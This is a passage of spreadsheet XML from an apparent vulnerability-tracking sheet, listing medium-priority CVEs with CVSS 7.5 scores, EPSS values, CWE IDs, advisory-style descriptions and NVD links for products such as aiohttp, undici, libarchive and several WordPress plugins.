    <row r="2486">
      <c r="A2486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2486" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51675</t>
        </is>
      </c>
      <c r="C2486" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2486" s="5" t="inlineStr"/>
      <c r="F2486" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2486" s="5" t="inlineStr"/>
      <c r="H2486" s="5" t="inlineStr"/>
      <c r="I2486" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2486" s="5" t="inlineStr"/>
      <c r="K2486" s="5" t="inlineStr">
        <is>
          <t>CWE-691</t>
        </is>
      </c>
      <c r="L2486" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in openRISC OR1200 commit 83ac6b. An inaccurate update of program counter (PC) values when SPR changes can lead to a Denial of Service (DoS).</t>
        </is>
      </c>
      <c r="M2486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51675</t>
        </is>
      </c>
    </row>
    <row r="2487">
      <c r="A2487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2487" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-52182</t>
        </is>
      </c>
      <c r="C2487" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2487" s="5" t="inlineStr"/>
      <c r="F2487" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2487" s="5" t="inlineStr"/>
      <c r="H2487" s="5" t="inlineStr"/>
      <c r="I2487" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2487" s="5" t="inlineStr"/>
      <c r="K2487" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2487" s="5" t="inlineStr">
        <is>
          <t>The Library Corporation LS2 Admin v5.7 to v5.8.0 was discovered to contain an information disclosure vulnerability.</t>
        </is>
      </c>
      <c r="M2487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-52182</t>
        </is>
      </c>
    </row>
    <row r="2488">
      <c r="A2488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2488" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61478</t>
        </is>
      </c>
      <c r="C2488" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2488" s="5" t="inlineStr"/>
      <c r="F2488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2488" s="5" t="inlineStr"/>
      <c r="H2488" s="5" t="inlineStr"/>
      <c r="I2488" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2488" s="5" t="inlineStr"/>
      <c r="K2488" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-830</t>
        </is>
      </c>
      <c r="L2488" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via Spoofed SYN packets.</t>
        </is>
      </c>
      <c r="M2488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61478</t>
        </is>
      </c>
    </row>
    <row r="2489">
      <c r="A2489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2489" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61479</t>
        </is>
      </c>
      <c r="C2489" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2489" s="5" t="inlineStr"/>
      <c r="F2489" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2489" s="5" t="inlineStr"/>
      <c r="H2489" s="5" t="inlineStr"/>
      <c r="I2489" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2489" s="5" t="inlineStr"/>
      <c r="K2489" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L2489" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via the SPC Connect Pro software accepts replayed application-layer payloads injected into an active TCP session.</t>
        </is>
      </c>
      <c r="M2489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61479</t>
        </is>
      </c>
    </row>
    <row r="2490">
      <c r="A2490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2490" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61480</t>
        </is>
      </c>
      <c r="C2490" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2490" s="5" t="inlineStr"/>
      <c r="F2490" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2490" s="5" t="inlineStr"/>
      <c r="H2490" s="5" t="inlineStr"/>
      <c r="I2490" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2490" s="5" t="inlineStr"/>
      <c r="K2490" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-354, CWE-362, CWE-400</t>
        </is>
      </c>
      <c r="L2490" s="5" t="inlineStr">
        <is>
          <t>An issue in Vanderbilt Industries, Acre Security SPC5300.000 Main Board v.3.14.1 allows a physically proximate attacker to cause a denial of service via spoofed TCP FIN packets without validating the sequence or acknowledgment numbers.</t>
        </is>
      </c>
      <c r="M2490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61480</t>
        </is>
      </c>
    </row>
    <row r="2491">
      <c r="A2491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2491" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61726</t>
        </is>
      </c>
      <c r="C2491" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2491" s="5" t="inlineStr"/>
      <c r="F2491" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="G2491" s="5" t="inlineStr"/>
      <c r="H2491" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2491" s="5" t="inlineStr">
        <is>
          <t>2026-01-28</t>
        </is>
      </c>
      <c r="J2491" s="5" t="inlineStr"/>
      <c r="K2491" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2491" s="5" t="inlineStr">
        <is>
          <t>The net/url package does not set a limit on the number of query parameters in a query. While the maximum size of query parameters in URLs is generally limited by the maximum request header size, the net/http.Request.ParseForm method can parse large URL-encoded forms. Parsing a large form containing many unique query parameters can cause excessive memory consumption.</t>
        </is>
      </c>
      <c r="M2491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61726</t>
        </is>
      </c>
    </row>
    <row r="2492">
      <c r="A2492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2492" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-63913</t>
        </is>
      </c>
      <c r="C2492" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2492" s="5" t="inlineStr"/>
      <c r="F2492" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2492" s="5" t="inlineStr"/>
      <c r="H2492" s="5" t="inlineStr"/>
      <c r="I2492" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J2492" s="5" t="inlineStr"/>
      <c r="K2492" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2492" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenSBI 1.3 allowing attackers to cause a denial of service via crafted request to the SBI function #2 or the 'Find and configure a matching counter' function of SBI PMU extension.</t>
        </is>
      </c>
      <c r="M2492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-63913</t>
        </is>
      </c>
    </row>
    <row r="2493">
      <c r="A2493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2493" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-69223</t>
        </is>
      </c>
      <c r="C2493" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2493" s="5" t="inlineStr"/>
      <c r="F2493" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2493" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2493" s="5" t="inlineStr">
        <is>
          <t>aiohttp:aiohttp</t>
        </is>
      </c>
      <c r="I2493" s="5" t="inlineStr">
        <is>
          <t>2026-01-05</t>
        </is>
      </c>
      <c r="J2493" s="5" t="inlineStr"/>
      <c r="K2493" s="5" t="inlineStr">
        <is>
          <t>CWE-409, CWE-770</t>
        </is>
      </c>
      <c r="L2493" s="5" t="inlineStr">
        <is>
          <t>AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host's memory. This issue is fixed in version 3.13.3.</t>
        </is>
      </c>
      <c r="M2493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-69223</t>
        </is>
      </c>
    </row>
    <row r="2494">
      <c r="A2494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2494" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70147</t>
        </is>
      </c>
      <c r="C2494" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2494" s="5" t="inlineStr"/>
      <c r="F2494" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2494" s="5" t="inlineStr"/>
      <c r="H2494" s="5" t="inlineStr">
        <is>
          <t>projectworlds:online_time_table_generator</t>
        </is>
      </c>
      <c r="I2494" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J2494" s="5" t="inlineStr"/>
      <c r="K2494" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L2494" s="5" t="inlineStr">
        <is>
          <t>Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests to these endpoints without a valid session.</t>
        </is>
      </c>
      <c r="M2494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70147</t>
        </is>
      </c>
    </row>
    <row r="2495">
      <c r="A2495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2495" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70148</t>
        </is>
      </c>
      <c r="C2495" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2495" s="5" t="inlineStr"/>
      <c r="F2495" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2495" s="5" t="inlineStr"/>
      <c r="H2495" s="5" t="inlineStr">
        <is>
          <t>codeastro:membership_management_system</t>
        </is>
      </c>
      <c r="I2495" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J2495" s="5" t="inlineStr"/>
      <c r="K2495" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2495" s="5" t="inlineStr">
        <is>
          <t>Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parameter, resulting in insecure direct object reference (IDOR).</t>
        </is>
      </c>
      <c r="M2495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70148</t>
        </is>
      </c>
    </row>
    <row r="2496">
      <c r="A2496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2496" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70962</t>
        </is>
      </c>
      <c r="C2496" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2496" s="5" t="inlineStr"/>
      <c r="F2496" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2496" s="5" t="inlineStr"/>
      <c r="H2496" s="5" t="inlineStr"/>
      <c r="I2496" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2496" s="5" t="inlineStr"/>
      <c r="K2496" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2496" s="5" t="inlineStr">
        <is>
          <t>Zosi C519M V4.2.8.823C01450BA is vulnerable to Incorrect Access Control. The application contains hardcoded credentials in the RTSP authentication mechanism. An attacker with network access can use the unchangeable default credentials to access the RTSP video stream, resulting in unauthorized viewing of camera footage.</t>
        </is>
      </c>
      <c r="M2496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70962</t>
        </is>
      </c>
    </row>
    <row r="2497">
      <c r="A2497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0860</t>
        </is>
      </c>
      <c r="C2497" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2497" s="5" t="inlineStr"/>
      <c r="F2497" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2497" s="5" t="inlineStr"/>
      <c r="H2497" s="5" t="inlineStr"/>
      <c r="I2497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2497" s="5" t="inlineStr"/>
      <c r="K2497" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2497" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to gain access to sensitive kernel information.
This issue affects Valhall GPU Kernel Driver: from r29p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t>
        </is>
      </c>
    </row>
    <row r="2498">
      <c r="A2498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12151</t>
        </is>
      </c>
      <c r="C2498" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2498" s="5" t="inlineStr"/>
      <c r="F2498" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2498" s="5" t="inlineStr"/>
      <c r="H2498" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="I2498" s="5" t="inlineStr">
        <is>
          <t>2026-06-17</t>
        </is>
      </c>
      <c r="J2498" s="5" t="inlineStr"/>
      <c r="K2498" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2498" s="5" t="inlineStr">
        <is>
          <t>Impact:
The undici WebSocket client enforces maxPayloadSize on the cumulative byte count of fragments in a message but does not enforce a limit on the number of fragments. A malicious WebSocket server can stream many small or empty continuation frames that each pass per-frame and cumulative-size validation, collectively causing unbounded memory growth in the client process. The result is memory exhaustion and a denial of service.
Affected applications are those using the undici WebSocket client (new WebSocket(...)) or the WebSocketStream API that can be induced to connect to an attacker-controlled or compromised WebSocket endpoint.
All releases starting at undici 6.17.0 are affected.
Patches: Upgrade to undici &gt;= 6.26.0, &gt;= 7.28.0, or &gt;= 8.5.0. Workarounds:
No workaround is available. The fix must be applied through an upgrade.</t>
        </is>
      </c>
      <c r="M2498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12151</t>
        </is>
      </c>
    </row>
    <row r="2499">
      <c r="A2499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12483</t>
        </is>
      </c>
      <c r="C2499" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2499" s="5" t="inlineStr"/>
      <c r="F2499" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2499" s="5" t="inlineStr"/>
      <c r="H2499" s="5" t="inlineStr"/>
      <c r="I2499" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2499" s="5" t="inlineStr"/>
      <c r="K2499" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L2499" s="5" t="inlineStr">
        <is>
          <t>The LearnDash LMS plugin for WordPress is vulnerable to Unrestricted File Type Upload in versions up to and including 5.1.5. This is due to insufficient input validation in the 'learndash_fileupload_process' function, which iterates through an entire array and validates only the first file. This makes it possible for authenticated attackers, with subscriber-level access and above who are enrolled in a course with assignment uploads enabled, to upload arbitrary disallowed files, including PHP files, to the server's wp-content/uploads/learndash/assignments/ directory. The uploaded files can only be used for Remote Code Execution if default server configurations have been changed to allow for execution.</t>
        </is>
      </c>
      <c r="M2499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12483</t>
        </is>
      </c>
    </row>
    <row r="2500">
      <c r="A2500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13297</t>
        </is>
      </c>
      <c r="C2500" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2500" s="5" t="inlineStr"/>
      <c r="F2500" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2500" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2500" s="5" t="inlineStr"/>
      <c r="I2500" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2500" s="5" t="inlineStr"/>
      <c r="K2500" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L2500" s="5" t="inlineStr">
        <is>
          <t>IBM Verify Identity Access Advanced Access Control may be vulnerable to an information disclosure attack.</t>
        </is>
      </c>
      <c r="M2500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13297</t>
        </is>
      </c>
    </row>
    <row r="2501">
      <c r="A2501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13676</t>
        </is>
      </c>
      <c r="C2501" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2501" s="5" t="inlineStr"/>
      <c r="F2501" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2501" s="5" t="inlineStr"/>
      <c r="H2501" s="5" t="inlineStr">
        <is>
          <t>openjsf:fast-uri</t>
        </is>
      </c>
      <c r="I2501" s="5" t="inlineStr">
        <is>
          <t>2026-06-29</t>
        </is>
      </c>
      <c r="J2501" s="5" t="inlineStr"/>
      <c r="K2501" s="5" t="inlineStr">
        <is>
          <t>CWE-436, CWE-551</t>
        </is>
      </c>
      <c r="L2501" s="5" t="inlineStr">
        <is>
          <t>fast-uri v</t>
        </is>
      </c>
      <c r="M2501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13676</t>
        </is>
      </c>
    </row>
    <row r="2502">
      <c r="A2502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14164</t>
        </is>
      </c>
      <c r="C2502" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2502" s="5" t="inlineStr"/>
      <c r="F2502" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2502" s="5" t="inlineStr"/>
      <c r="H2502" s="5" t="inlineStr"/>
      <c r="I2502" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J2502" s="5" t="inlineStr"/>
      <c r="K2502" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2502" s="5" t="inlineStr">
        <is>
          <t>A double free issue has been identified in libarchive's RAR5 reader. During parsing of a specially crafted RAR5 archive, the filtered_buf pointer may remain stale after being freed during unpacking state reinitialization. Subsequent processing of another archive entry can trigger a second free of the same memory region, resulting in a double-free condition. Successful exploitation may cause applications using the vulnerable libarchive API to terminate unexpectedly, leading to a denial of service.</t>
        </is>
      </c>
      <c r="M2502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14164</t>
        </is>
      </c>
    </row>
    <row r="2503">
      <c r="A2503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14296</t>
        </is>
      </c>
      <c r="C2503" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2503" s="5" t="inlineStr"/>
      <c r="F2503" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2503" s="5" t="inlineStr"/>
      <c r="H2503" s="5" t="inlineStr"/>
      <c r="I2503" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2503" s="5" t="inlineStr"/>
      <c r="K2503" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L2503" s="5" t="inlineStr">
        <is>
          <t>When using the Direct XIP
update strategy, the main application image starts other cores (i.e. radio
core), based on the currently active slot without additional verification. The
MCUboot in the bare (upstream) configuration assumes that if there is at least
a single slot for each image available, the system is bootable and continues
the boot process. This may lead to a situation when MCUboot picks different
slot for different images (i.e. (a) for the main application and (b) for the
radio image), boots the main application (from slot (a)) that afterwards starts
the radio image by providing an address of the unauthenticated slot ((a)
instead of (b)).</t>
        </is>
      </c>
      <c r="M2503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14296</t>
        </is>
      </c>
    </row>
    <row r="2504">
      <c r="A2504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14444</t>
        </is>
      </c>
      <c r="C2504" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2504" s="5" t="inlineStr"/>
      <c r="F2504" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2504" s="5" t="inlineStr"/>
      <c r="H2504" s="5" t="inlineStr"/>
      <c r="I2504" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2504" s="5" t="inlineStr"/>
      <c r="K2504" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2504" s="5" t="inlineStr">
        <is>
          <t>The WP Fusion (Pro) plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.47.13. This is due to insufficient authorization checks on the role parameter in the ThriveCart Auto Login handler's thrivecart() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, and who possess the access_key, to create a new user account with administrator privileges and gain full control over the WordPress site. The required access_key is intentionally shared with ThriveCart customers as part of the plugin's documented setup process, making it accessible to attackers who have made a purchase. The vulnerability is only exploitable when the ThriveCart Auto Login option is enabled.</t>
        </is>
      </c>
      <c r="M2504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14444</t>
        </is>
      </c>
    </row>
    <row r="2505">
      <c r="A2505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14957</t>
        </is>
      </c>
      <c r="C2505" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2505" s="5" t="inlineStr"/>
      <c r="F2505" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2505" s="5" t="inlineStr"/>
      <c r="H2505" s="5" t="inlineStr"/>
      <c r="I2505" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2505" s="5" t="inlineStr"/>
      <c r="K2505" s="5" t="inlineStr">
        <is>
          <t>CWE-252, CWE-617</t>
        </is>
      </c>
      <c r="L2505" s="5" t="inlineStr">
        <is>
          <t>In FIPS mode, Libreswan's add_decoded_cert() function calls CERT_ExtractPublicKey() and asserts that the result is not NULL. However, CERT_ExtractPublicKey() returns NULL when public key extraction fails, for example if the RSA exponent is set to 0. A remote attacker can send a malformed X.509 certificate in a CERT payload to trigger the assertion, causing the pluto daemon to abort and restart. Continued exploitation causes a denial of service. No remote code execution is possible. Both IKEv1 and IKEv2 are affected. The vulnerability is only exploitable when both the OS and libreswan are running in FIPS mode and at least one CA certificate is loaded. The CERT payload is processed before peer authentication, so no credentials are needed to exploit this. Configurations using only PreSharedKey (PSK) authentication with no CA certificates loaded in the NSS database are not vulnerable.</t>
        </is>
      </c>
      <c r="M2505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14957</t>
        </is>
      </c>
    </row>
    <row r="2506">
      <c r="A2506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15019</t>
        </is>
      </c>
      <c r="C2506" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2506" s="5" t="inlineStr"/>
      <c r="F2506" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2506" s="5" t="inlineStr"/>
      <c r="H2506" s="5" t="inlineStr"/>
      <c r="I2506" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2506" s="5" t="inlineStr"/>
      <c r="K2506" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2506" s="5" t="inlineStr">
        <is>
          <t>The Direct Download for WooCommerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.19 via the (top-level include) function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. The product ownership check only verifies that some free, virtual, downloadable product exists on the site — not that the requested file path belongs to that product's configured downloads — making exploitation viable on any WooCommerce site with at least one such product.</t>
        </is>
      </c>
      <c r="M2506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15019</t>
        </is>
      </c>
    </row>
    <row r="2507">
      <c r="A2507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-1519</t>
        </is>
      </c>
      <c r="C2507" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2507" s="5" t="inlineStr"/>
      <c r="F2507" s="5" t="n">
        <v>0.016</v>
      </c>
